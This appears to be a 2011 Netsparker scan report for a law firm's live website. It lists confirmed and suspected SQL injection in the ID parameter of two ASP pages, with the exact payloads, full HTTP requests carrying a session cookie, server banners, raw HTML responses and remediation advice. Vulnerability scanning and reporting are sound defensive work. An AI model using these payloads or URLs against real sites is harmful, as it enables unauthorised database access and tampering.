Netsparker, Web Application Security Scanner

Boolean SQL Injection, XSS Report SUMMARY

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.brownrudnick.com/nr/articlesIndv.a...
SCAN DATE
4/16/2011 9:56:07 AM
REPORT DATE
4/16/2011 10:56:40 AM
SCAN DURATION
00:35:14

Total Requests

Average Speed

req/sec.
16
identified
10
confirmed
4
critical
4
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
25 %
IMPORTANT
19 %
LOW
31 %
INFORMATION
25 %
Boolean Based SQL Injection

Boolean Based SQL Injection

2 TOTAL
CRITICAL
CONFIRMED
2
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /disc/cntcdisclaimer.asp

/disc/cntcdisclaimer.asp CONFIRMED

http://www.brownrudnick.com/disc/cntcdisclaimer.asp?ID=-1+OR+17-7%3d10

Parameters

Parameter Type Value
ID GET -1 OR 17-7=10

Request

GET /disc/cntcdisclaimer.asp?ID=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.brownrudnick.com/nr/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:59:15 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12682
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../nr/">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover">
<a href="cntcdisclaimer.asp"><font face="Verdana" size="1">terms of use</font></a></td>

</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="../images/filecabTB.jpg" width="244" height="178"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
</td>
<td width="48%" height="3">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Notice</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="386">
<tr>
<td width="52%" height="385" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 9pt">Y</font><font style="font-size: 8.5pt" face="Verdana">ou
understand and agree that transmitting information to Brown
Rudnick&nbsp;by e-mail does not establish an attorney-client
relationship. By clicking the &quot;Agree&quot; link below, you acknowledge
that (i) Brown Rudnick&nbsp;has no obligation to maintain the
confidentiality of any information you submit to Brown
Rudnick&nbsp;unless Brown Rudnick&nbsp;already represents you or Brown
Rudnick&nbsp;later agrees to represent you; thus, if you are not a
client, information you submit to Brown Rudnick&nbsp;by e-mail may be
disclosed to others and (ii) you have read and
understand the Brown Rudnick <a target="_blank" href="../terms.htm">
Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a> and that you agree to be bound by
the terms and conditions of such
<a target="_blank" href="../terms.htm">Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a>.</font></p>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 8.5pt">If you would like to
discuss becoming a client, please contact one of Brown Rudnick's
attorneys to arrange for a meeting or telephone conference. Thank
you for your interest in Brown Rudnick.</font></p>
<font size="2">
<div align="center">
<table id="table2" width="204">
<tbody>
<tr>
<td class="BodyHover" width="89">
<p align="center"><font face="Verdana" size="2"><a href="mailto:'aandromalos@brownrudnick.com'">
Agree</a></font></td>
<td class="BodyHover" width="105">
<p align="center"><font face="Verdana" size="2">
<a href="javascript:history.back()">Disagree</a></font></td>
</tr>
</tbody>
</table></div>
</font>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber10" height="39">
<tr>
<td width="100%" height="39">
<form method="POST" action="../search/result.asp">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="689" id="AutoNumber12" height="49">
<tr>
<td width="100%" height="22">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
&nbsp;<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font face="Verdana" size="1"><a href="javascript:history.back()">
Previous Page</a></font><font face="Verdana" style="font-size: 8.5pt"><br>
<br>
&nbsp;</font></td>
</tr>
</table>

</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table height="20" cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
</tbody>
</table>
</td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="385" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="385" bgcolor="#FFFFFF">
<p align="center" style="margin-left: 4">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td&g..
- /nr/articlesIndv.asp

/nr/articlesIndv.asp CONFIRMED

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=-1+OR+17-7%3d10

Parameters

Parameter Type Value
ID GET -1 OR 17-7=10

Request

GET /nr/articlesIndv.asp?ID=-1+OR+17-7%3d10 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:57:15 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 362128
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr>
<td width="562" valign="top" height="1">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font face="Verdana" style="font-size: 9pt; font-weight:700" color="#53688C">
Bankruptcies Cast Shadows on Three Embattled Industries</font></td>
</tr>
<tr>
<td height="1">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font style="font-size: 9pt" face="Verdana">
Boston Business Journal-
<font color="#83807C">
1/31/2003</font>
</font></td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font style="font-size: 9pt" face="Verdana">
By:
<a href="../bio/bio.asp?ID=173">Steven D. Pohl</a></font></td>
</tr>
<tr>
<td height="1%" valign="top">&nbsp;</td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font style="font-size: 8.5pt" face="Verdana">
Large corporate scandals have caused a sudden rise in bankruptcy filings, demanding a fresh examination
of bankruptcy laws in those industries most affected by this economic slump � telecommunications, energy, and technology. Brown Rudnick partner Steve Pohl explains the unique challenges telecom bankruptcies pose due to network obligations to foreign vendors and the need to maintain access to the networks of other telecoms. He also examines energy and technology bankruptcy laws, concluding that these industries face higher risks in filing for bankruptcy and are thus less able to benefit from the process.</font></td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font style="font-size: 8.5pt" face="Verdana"><br>
</font></td>
</tr>
<tr>
<td width="562" valign="top" height="1">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font face="Verdana" style="font-size: 9pt; font-weight:700" color="#53688C">
Brown Rudnick Berlack Israels Scores on The American Lawyer's Survey</font></td>
</tr>
<tr>
<td height="1">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font style="font-size: 9pt" face="Verdana">
The American Lawyer-
<font color="#83807C">
10/1/2003</font>
</font></td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font style="font-size: 9pt" face="Verdana">
Referencing:
Brown Rudnick</font></td>
</tr>
<tr>
<td height="1%" valign="top">&nbsp;</td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font style="font-size: 8.5pt" face="Verdana">
Over 4000 mid-level associates from 211 law firms were surveyed in this year's "Best Places to Work" ranking, conducted by The American Lawyer. Results placed Brown Rudnick 4th among Boston-based firms and 36th on the overall national listing -- among the top 25%.

<br><br>

Participants were asked to rank their firm on a number of criteria, including overall firm leadership, professional development, mentorship, attitude toward pro bono, partner and associate relations, and family-friendliness.</font></td>
</tr>
<tr>
<td height="1%" valign="top">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font style="font-size: 8.5pt" face="Verdana"><br>
</font></td>
</tr>
<tr>
<td width="562" valign="top" height="1">
<p style="margin-left: 100; margin-right: 5; line-height:105%">
<font face="Verdana" style="font-size: 9pt; font-weight:700" color="#53688C">
In-House Counsel Setting The Tone: Preparing a Strong Standard Contract</font></td>
</tr>
<tr>
<td height="1">
&l..
[High Possibility] SQL Injection

[High Possibility] SQL Injection

2 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /nr/articlesIndv.asp

/nr/articlesIndv.asp

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHA..

Parameters

Parameter Type Value
ID GET convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Request

GET /nr/articlesIndv.asp?ID=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:56:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11159
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
